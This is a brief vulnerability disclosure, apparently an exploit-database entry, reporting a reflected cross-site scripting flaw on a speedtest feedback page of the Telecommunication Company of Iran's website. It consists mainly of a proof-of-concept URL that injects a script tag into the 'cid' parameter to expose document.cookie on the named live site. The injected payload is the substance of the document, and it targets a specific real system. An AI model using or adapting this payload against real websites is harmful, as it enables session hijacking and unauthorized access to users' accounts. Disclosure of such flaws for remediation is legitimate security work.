**************************************************************
* Title * Telecommunication Company of Iran's website xss vulnerability *
* Author * Agent W *
* Tested On * Windows 10-64bit Firefox 67.0 *
* Vendor * https://tci.ir *
**************************************************************
/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
###################################################
# POC #
###################################################
URL: http://speedtest.tci.ir/feedback.php?cid=1&type=complaint
Vulnerable Parameter: cid
Example: http://speedtest.tci.ir/feedback.php?cid=1"><script>alert(document.cookie)</script>&type=complaint